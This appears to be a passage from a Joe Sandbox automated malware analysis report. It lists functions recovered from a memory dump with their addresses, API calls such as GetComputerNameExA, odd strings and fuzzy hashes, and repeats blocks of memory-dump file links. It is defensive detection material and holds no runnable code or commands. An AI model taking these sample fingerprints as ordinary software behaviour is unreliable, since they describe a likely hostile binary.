Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: '$iJ
API String ID: 0-30662343
Opcode ID: 9eb877f9d79145662de444d8aa3e3e5109af5fff32e045eea6012e04776b0606
Instruction ID: cd9b552e0395f775ffa3f747a5f98498cabba9f42ccab962a0cc6ac9b4238da4
Opcode Fuzzy Hash: 9eb877f9d79145662de444d8aa3e3e5109af5fff32e045eea6012e04776b0606
Instruction Fuzzy Hash: B202247061C3D18FD729CF2990603ABBFE1AF97304F1859ADE4CA97282D77984058B67

Function 00D8BFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00D8C113
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00D8C1D8

Strings

x, xrefs: 00D8C2F2

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: ComputerName
String ID: x
API String ID: 3545744682-2363233923
Opcode ID: 4909f549212e3eefa2c0ac51f010154554ad5ffc2ded609d2a910c5908ec6bb8
Instruction ID: 397c90ab4fd3ae37f330bf8e4ab351e6cde9c690617be5da0738714b039a03cf
Opcode Fuzzy Hash: 4909f549212e3eefa2c0ac51f010154554ad5ffc2ded609d2a910c5908ec6bb8
Instruction Fuzzy Hash: 58D1F56061C7D18EDB398B2884903BBBBD1AFA7354F1C99ADD0D58B282D735940AC773

Function 00D697B0 Relevance: 5.4, Strings: 4, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D276C559E4FF6A7223D904AF30EFEBBC, xrefs: 00D6987B
w, xrefs: 00D6995C
_P, xrefs: 00D69C05
EIFT, xrefs: 00D69875, 00D69880, 00D698C1

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: D276C559E4FF6A7223D904AF30EFEBBC$EIFT$_P$w
API String ID: 0-2839896022
Opcode ID: 4541c5c8695d9b00a0bae06e26d8c74e1c74423c96de1e47fd1d0d646f9bbcef
Instruction ID: 5454d4eae8b2425ce6071656428b076232a55d0f61e849cac65076f5f26d7dcc
Opcode Fuzzy Hash: 4541c5c8695d9b00a0bae06e26d8c74e1c74423c96de1e47fd1d0d646f9bbcef
Instruction Fuzzy Hash: 17C1257164C3409BD718CF35C8526AFBBE6EBD1314F18892DE4D28B391DA39C909CB66

Function 00D86170 Relevance: 5.3, Strings: 4, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

cba`, xrefs: 00D861C1
YNMZ, xrefs: 00D86446
4zVc, xrefs: 00D8621C
8zVc, xrefs: 00D8627D

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: 4zVc$8zVc$YNMZ$cba`
API String ID: 2994545307-1799417857
Opcode ID: bd57d5453affcc2fecc7fd628c36d17bb1245c8ba8538abe0c89f9f8fc19d4e8
Instruction ID: 1ab2b726a1039deffa90eb02dc02475ffa4bcc5b7dd01ceb8b20ea1311060612
Opcode Fuzzy Hash: bd57d5453affcc2fecc7fd628c36d17bb1245c8ba8538abe0c89f9f8fc19d4e8
Instruction Fuzzy Hash: AC9118B2A083109BD724EE29DC91B2BB296EFD1724F1D852CE98597251E674D80087B5

Function 00D687F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00D6897C

Strings

YO9W, xrefs: 00D68822

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: ExitProcess
String ID: YO9W
API String ID: 621844428-386669604
Opcode ID: 5733ca17e31d57a9f73f91123b15a0505af1fc5919e648959ab6b93d95b48f95
Instruction ID: e4b0da01c0ea90f5aaeb4e23f7d94a2bc076511ce1bfedb7723612d815286897
Opcode Fuzzy Hash: 5733ca17e31d57a9f73f91123b15a0505af1fc5919e648959ab6b93d95b48f95
Instruction Fuzzy Hash: BE314573F5022807C71C69B98C563AAB5878BC4714F0F963D5DD8AB386FDB88C0486E2

Function 00D76B7E Relevance: 1.8, APIs: 1, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8694f60cb9c8bc2e7651772ca59bd5c6101a01fa653a365e53709d0b3123cf6
Instruction ID: 95e8adcec14ebe9a209dea96ce78ee16106fc7e1e49b91c373484b086682d954
Opcode Fuzzy Hash: b8694f60cb9c8bc2e7651772ca59bd5c6101a01fa653a365e53709d0b3123cf6
Instruction Fuzzy Hash: D3A116B1504B418FC725CF28C891623BBE2EF56310B18CA5CD48A8B792F735E845CB71

Function 00D9E690 Relevance: 1.6, Strings: 1, Instructions: 384COMMON

Download Yara Rule

Strings

@CDE, xrefs: 00D9E8D1

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: @CDE
API String ID: 2994545307-1513065382
Opcode ID: 3426407539ed9f0bd5a875a083d4df5214232ea561d82e4b85f48e5f4bf45327
Instruction ID: 9eb2050c091205d7a097f95f3191dafcabaf531f4105463b11a98683154d52e1
Opcode Fuzzy Hash: 3426407539ed9f0bd5a875a083d4df5214232ea561d82e4b85f48e5f4bf45327
Instruction Fuzzy Hash: 39B113717483418BCB28CB29D8D193BFBE6ABE5314F1C892CE586C7392D635D84587A2

Function 00D9B480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00D9D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00D9B4AE

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00D77E82 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

tuv, xrefs: 00D78856

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: tuv
API String ID: 0-2475268160
Opcode ID: d95e1cb4d6b835c7ab11aedf04a07438be1f6fd18bd386a6489055914ebe7e0a
Instruction ID: c549a6720baa565977ac288318f5dee4d318f7f90295f1d92f0e60ab130e1eaf
Opcode Fuzzy Hash: d95e1cb4d6b835c7ab11aedf04a07438be1f6fd18bd386a6489055914ebe7e0a
Instruction Fuzzy Hash: 0B612FB6604701CBD7208F24D892767B3A2FF96314F18896DE99A873A1F775E804D770

Function 00D9DBD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 00D9DC39

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 440795aeda7e3d4e1025453175347a9be81781c797fc206d1eaa22353ab1a86e
Instruction ID: bdc686e32a44e098ffbfe9b51a729069e1697693886d4320f68aea2fc809762c
Opcode Fuzzy Hash: 440795aeda7e3d4e1025453175347a9be81781c797fc206d1eaa22353ab1a86e
Instruction Fuzzy Hash: A731F1B11083049FC714DF18D8D166BFBF9FF9A314F18892DE68687291D3719948CBA6

Function 00D69CC0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

\U^_, xrefs: 00D69CE5

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: \U^_
API String ID: 0-352632802
Opcode ID: a3a1e540eb4388ca579bb3210acafbb164a7ece3c4b481efe4463b54a2f6073e
Instruction ID: 1f92b0d5ec2ec7c26739760f859f4e3f2a208c9a02376c08ecb9340a71f265b3
Opcode Fuzzy Hash: a3a1e540eb4388ca579bb3210acafbb164a7ece3c4b481efe4463b54a2f6073e
Instruction Fuzzy Hash: AB11E23160C3808FC3249F3594549ABBBA5EFD7744F544A2CE0C55B341C735980A8FA6

Function 00D70FD6 Relevance: .9, Instructions: 882COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f42a0e422ec6656190ccc6a28cbf31e571175d2f10b9e8093d702eb41a3a2b0
Instruction ID: b4935b07f91b91fa5b939ffff6e92700ab6995a6d1ab501f3655f64aedb43ffa
Opcode Fuzzy Hash: 0f42a0e422ec6656190ccc6a28cbf31e571175d2f10b9e8093d702eb41a3a2b0
Instruction Fuzzy Hash: 7372C376604B408FD714DF3CC48536ABBE1AB95310F198A2DD8EBC7792E635E505CB22

Function 00D9DCF0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb2c3515c11cc45fbeed6aaf7d7a9a428b7dcb5b5a22cfe82bf9aca0a40de3d8
Instruction ID: fb711f6c9842bfced55149467a9ac390a610865f9ea2aa0f51444c9cac6c8a1a
Opcode Fuzzy Hash: fb2c3515c11cc45fbeed6aaf7d7a9a428b7dcb5b5a22cfe82bf9aca0a40de3d8
Instruction Fuzzy Hash: 677126326043055BCB14AE29C851A3FB7A7EFD5750F1EC52CE8868B365EB309C5187A2

Function 00D99B90 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45675fc3020a9a8bda1769a58400f7951472b6dceb99ea3540b4bc85ef2bb97f
Instruction ID: 41f578caeeb389bf92699e180e28b4e9829eb690544c5ed90ddd0bc337c5430d
Opcode Fuzzy Hash: 45675fc3020a9a8bda1769a58400f7951472b6dceb99ea3540b4bc85ef2bb97f
Instruction Fuzzy Hash: 53614A726083045FDB28DB2CD9A1B7BF792EBD0314F2D846DD5868B355EA319C01CBA1

Function 00D9B420 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,00D6B29B,?,00000001,?,?,?,?,?,?,?), ref: 00D9B452

